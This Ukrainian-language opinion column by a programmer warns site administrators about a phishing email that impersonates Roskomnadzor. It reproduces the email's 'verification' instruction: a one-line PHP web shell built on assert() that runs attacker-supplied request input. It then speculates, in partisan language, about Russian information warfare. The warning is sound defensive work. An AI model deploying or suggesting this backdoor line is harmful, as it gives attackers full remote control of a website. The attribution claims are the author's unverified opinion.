15 вересня 2019, 12:55 Житомир: °C
Александр Пашковский
Военнослужащий, программист

Хакерська атака чи гра спецслужб?

Нещодавно на сайті Інтернет-видання «Репортер Житомира » (reporter.zt.ua) з’явилася публікація під назвою «Росія заблокує Репортер Житомира на території РФ?» (http://reporter.zt.ua/news/18173-rosiia-zablokuie-reporter-zhytomyra-na-terytorii-rf), в якій автор статті стверджує, що на адресу видання надійшов електронний лист нібито від «Федеральної служби по нагляду у сфері зв’язку, інформаційних технологій і масових комунікацій», більш відомої як «Роскомнадзор». В листі співробітники даної путінської структури вимагають від адміністратора сайту провести його (адміністратора) ідентифікацію. При цьому, вони посилаються на вимоги Федерального закону від 05.05.2014 року №97-ФЗ та рішення Новокуйбишевського міського суду Самарської області від 11.08.2015 року №21618/2015, відповідно до яких сайт «Репортер Житомира» внесено до переліку сайтів зі щоденним відвідуванням понад 3 тис. користувачів мережі Інтернет. У випадку відмови від ідентифікації «РоскомПутіннадзор» погрожує, що заблокує сайт на території РФ і «біженці» з Житомирської області, які втекли від диктатури «хунти» до «демократичної» і «миролюбної» Росії, не зможуть більше читати новини про рідну землю з «Рупора Житомира». Правда прикольно?

Мені вдалося роздобути ту саму інструкцію, яку «Роскомнадзор» направив не лише Інтернет-виданню з Житомирщини, а й іншим виданням як на території України, так і за її межами, в т.ч. і на території Російської Федерації. А виглядає інструкція наступним чином:

  1. Необхідно створити в кореневому каталозі сайту каталог reestr;

  2. Створити в даному каталозі файл reestr-id128032.php, який має містити наступний текст:

<?php

/*Подтверждение доменного имени сайта*/ assert(stripslashes($_REQUEST[roskomnadzor]));

?>

  1.  Шлях до файлу при цьому має виглядати так: домен/reestr/reestr-id128032.php.

 

Ось в такий не хитрий спосіб, за версією «РоскомПНХнадзору», адміністратор сайту нібито і може ідентифікувати себе як адміністратор сайту!!!(звучить якось не дуже, але саме це просить зробити головна структура по цензурі в Росії). Так от, якщо цей пост читають програмісти РНР, то вони відразу побачать, що в такий спосіб хтось намагається приховано (хоча і не дуже приховано) виконати скрипти, які будуть записані у файл, на який посилається супер-глобальна змінна roskomnadzor. Найімовірніше, що у файлі буде описаний код, який надасть повний доступ до сайту людині, що надіслала такого листа від імені «Роскомнадзору».

Можна було б припустити, що в такий спосіб хакери хочуть зламати сайти Інтернет-видань та заробити на цьому немалі кошти. Та навряд чи це так. Оскільки Інтернет-видання, більш за все не будуть платити за відновлення працездатності своїх сайтів, а здійснять розгортання резервної копії (ну, нічого крім новин та реклами там немає, заробіток залежить лише від реклами та не пов’язаний із онлайн-замовленнями як, наприклад, у Інтернет-магазинах, кожна година простою яких виливається власникам у чималу копійчину, а тому Інтернет-виданням і немає за що платити). Зовсім інше – це отримати постійний прихований доступ до сайту з метою «правильної» модифікації інформації, що публікується виданням, видалення «непотрібних» коментарів, а в окремих випадках і розміщення «потрібних» статей нібито від імені місцевих журналістів, адже усім відомо, що саме кома у виразі «казнить нельзя помиловать» може вирішити долю не лише людини, а і, як унашому випадку, цілої держави.

Думаю не варто довго думати, кому ж вигідно отримати доступ до Інтернет-видань України? Правильно – постійні чвари між лідерами «ДНР/ЛНР», виснаженість фінансових та людських ресурсів не дають ПТН ПНХ продовжувати повноцінні бойові дії на Сході України. Тому вірні васали «московського царя» не покидають спроб продовжувати хоча б інформаційну війну: вносити деструктив всередині України, підігрівати обурення населення діями влади, вчиняти провокації за участю патріотів (Мукачеве, Київ) та ослабляти таким чином обороноздатність на території проведення АТО з метою захоплення нових територій «малою російською кров’ю». Прокатавши такий сценарій на Інтернет-виданнях, можна перейти і до більш серйозних кроків — наприклад отримати доступ до інформаційних ресурсів Верховної Ради, Президента, Кабміну тощо. А перед виборами - і до ресурсів ЦВК.

«Навіщо ж закидати подібні листи на російські Інтернет-ЗМІ?» - запитаєте ви? Відповім – той, хто придумав такий фейк передбачав, що у своїй більшості українці не підуть на таку дешеву провокацію, а тому потрібно підготувати шлях для відступу або завдати удару з іншої сторони. Наприклад, звинуватити у атаці на російські ЗМІ українських хакерів-бандерівців та спецслужби України, які найняли Інтернет-карателів на роботу.

Цією статтею я хочу допомогти людям, які мало розбираються в технічних аспектах роботи Інтернет-сайтів та за відсутності вільних коштів здійснюють адміністрування ресурсів власними силами, не вскочити в лайно та не отримати проблем, пов’язаних із роботою Інтернет-ресурсів, які дають їм можливість заробити на хліб. Я прагну, щоб в Українському Інтернет-просторі царювала свобода слова, усі події описувались об'єктивно і ніхто не міг перекручувати інформацію на свій лад, особливо ті, хто прийшов з мечем на мою Богом дану ЄДИНУ СОБОРНУ УКРАЇНУ!!!

Слава Україні! Перемога буде за нами — бо з нами правда і Бог!